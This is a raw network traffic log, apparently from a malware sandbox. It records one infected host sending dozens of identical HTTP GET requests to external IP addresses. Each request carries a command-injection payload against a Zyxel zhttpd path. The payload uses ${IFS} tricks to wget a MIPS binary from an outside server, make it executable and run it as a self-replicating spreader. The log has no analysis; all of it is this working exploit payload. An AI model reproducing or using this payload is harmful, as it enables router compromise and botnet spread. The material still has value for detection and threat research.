                                                      Feb 2, 2024 06:35:54.662328959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4839192.168.2.145008025.134.176.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662339926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4840192.168.2.145846476.29.97.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662398100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4841192.168.2.1455146144.69.210.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662414074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4842192.168.2.1441044133.153.102.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662467003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4843192.168.2.1450214137.79.37.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662498951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4844192.168.2.1453658208.140.87.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662545919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4845192.168.2.144289060.194.253.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662600040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4846192.168.2.1456844118.14.203.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662650108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4847192.168.2.1452538136.25.111.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662687063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4848192.168.2.14600464.208.78.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662724018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4849192.168.2.1448332200.72.130.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662755966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4850192.168.2.1438574161.2.113.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662810087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4851192.168.2.1453526121.167.8.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662851095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4852192.168.2.1459104176.59.4.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662899971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4853192.168.2.1436324162.236.58.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662945032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4854192.168.2.1443382194.183.163.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.662978888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4855192.168.2.1458402196.224.202.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663012981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4856192.168.2.1452098121.91.79.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663050890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4857192.168.2.145878270.102.74.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663094044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4858192.168.2.1446522180.167.248.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663150072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4859192.168.2.145909659.179.39.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663186073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4860192.168.2.143998691.144.105.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663254976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4861192.168.2.1438758162.175.140.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663275957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4862192.168.2.145032813.227.177.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663337946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4863192.168.2.1458132190.8.183.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663373947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4864192.168.2.145929854.112.167.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663415909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4865192.168.2.14586844.130.193.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663464069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4866192.168.2.1446316111.212.162.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663510084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4867192.168.2.1436372217.209.253.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663542986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4868192.168.2.1457592141.246.17.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663592100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4869192.168.2.1447144112.13.215.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663623095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4870192.168.2.1434954140.136.84.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663657904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4871192.168.2.1434620150.244.93.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663710117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4872192.168.2.1440762122.155.63.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663752079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4873192.168.2.144741092.220.173.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663806915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4874192.168.2.145739036.239.86.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663815022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4875192.168.2.1437188153.162.32.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663857937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4876192.168.2.145063682.236.29.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663897991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4877192.168.2.1447408129.145.134.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663925886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4878192.168.2.145855447.45.170.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.663981915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4879192.168.2.1448028159.254.247.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664025068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4880192.168.2.1450940197.3.96.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664057016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4881192.168.2.143853843.164.69.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664120913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4882192.168.2.145778241.139.183.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664172888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4883192.168.2.145884066.168.194.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664220095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4884192.168.2.144693840.179.112.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664272070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4885192.168.2.1440928181.191.47.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664299965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4886192.168.2.1460062203.0.193.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664364100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4887192.168.2.144559431.111.249.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664391041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4888192.168.2.1450476139.178.32.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664434910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4889192.168.2.144015414.65.221.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664455891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4890192.168.2.1432958140.170.104.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664501905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4891192.168.2.1435534169.153.64.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664547920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4892192.168.2.143915439.141.53.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664594889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4893192.168.2.1438142171.242.94.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664634943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4894192.168.2.144760246.191.253.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664674997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4895192.168.2.145141465.156.31.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664707899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4896192.168.2.144438084.78.203.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664735079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4897192.168.2.1456172102.223.82.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664767981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4898192.168.2.1433112196.239.9.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664803028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4899192.168.2.143530282.105.128.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664838076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4900192.168.2.143986061.50.181.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.664874077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4901192.168.2.1437058137.59.114.24443
                                                      TimestampBytes transferredDirectionData
